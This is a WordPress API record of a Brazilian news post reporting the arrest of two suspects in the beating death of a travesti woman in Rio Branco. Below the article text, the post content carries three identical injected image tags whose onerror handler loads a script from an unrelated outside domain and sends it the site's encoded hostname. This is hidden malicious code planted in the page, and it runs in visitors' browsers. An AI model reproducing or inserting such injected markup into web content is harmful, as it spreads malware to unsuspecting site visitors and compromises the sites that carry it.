{"id":49213,"date":"2020-08-04T13:49:59","date_gmt":"2020-08-04T13:49:59","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/08\/04\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/"},"modified":"2020-08-04T13:49:59","modified_gmt":"2020-08-04T13:49:59","slug":"suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/","title":{"rendered":"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos"},"content":{"rendered":"<p style=\"text-align: justify;\">V\u00edtima foi assassinada a pauladas<\/p>\n<p style=\"text-align: justify;\">Ap\u00f3s investiga\u00e7\u00f5es, a Pol\u00edcia Civil prendeu dois suspeitos de envolvimento no assassinato da travesti Fernanda Machado da Silva, 27 anos, encontrada morta na madrugada do dia 25 de junho de 2020, na Rua Minas Gerais, no bairro Prevent\u00f3rio, em Rio Branco.<\/p>\n<p style=\"text-align: justify;\">De acordo com as investiga\u00e7\u00f5es da Delegacia Especializada em Homic\u00eddios e Prote\u00e7\u00e3o a Pessoa (DHPP), a v\u00edtima sofreu v\u00e1rias agress\u00f5es ap\u00f3s ser acusada pelos suspeitos de furtar um celular. Os dois homens, ent\u00e3o, espancaram Fernanda at\u00e9 a morte com peda\u00e7os de pau.<\/p>\n<p style=\"text-align: justify;\">Junto com os dois envolvidos, os agentes da DHPP prenderam tamb\u00e9m uma mulher em flagrante pelo crime de tr\u00e1fico de drogas, 548 trouxinhas de entorpecentes foram apreendidas.<\/p>\n<p style=\"text-align: justify;\">Ap\u00f3s o assassinato brutal de Fernanda, o Minist\u00e9rio P\u00fablico e a Associa\u00e7\u00e3o das Travestis e Transexuais do Acre (ATTRAC), lamentaram sua morte em nota, e divulgaram um v\u00eddeo em que ela aparece ao lado da m\u00e3e falando sobre a viol\u00eancia que pessoas LGBTQIA+ sofrem. A travesti foi assassinada na semana do Orgulho LGBT.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\">V\u00edtima foi assassinada a pauladas<\/p>\n","protected":false},"author":4,"featured_media":49212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-49213","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"V\u00edtima foi assassinada a pauladas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-08-04T13:49:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/\",\"name\":\"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg\",\"datePublished\":\"2020-08-04T13:49:59+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg\",\"width\":458,\"height\":340,\"caption\":\"04-08-2020 fernanda-machado\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/","og_locale":"pt_BR","og_type":"article","og_title":"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net","og_description":"V\u00edtima foi assassinada a pauladas","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/","og_site_name":"Agazeta.net","article_published_time":"2020-08-04T13:49:59+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/","name":"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg","datePublished":"2020-08-04T13:49:59+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/04-08-2020_fernanda-machado.jpeg","width":458,"height":340,"caption":"04-08-2020 fernanda-machado"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/suspeitos-do-assassinato-da-travesti-fernanda-machado-sao-presos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Suspeitos da morte da travesti Fernanda Machado s\u00e3o presos"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=49213"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49213\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/49212"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=49213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=49213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=49213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}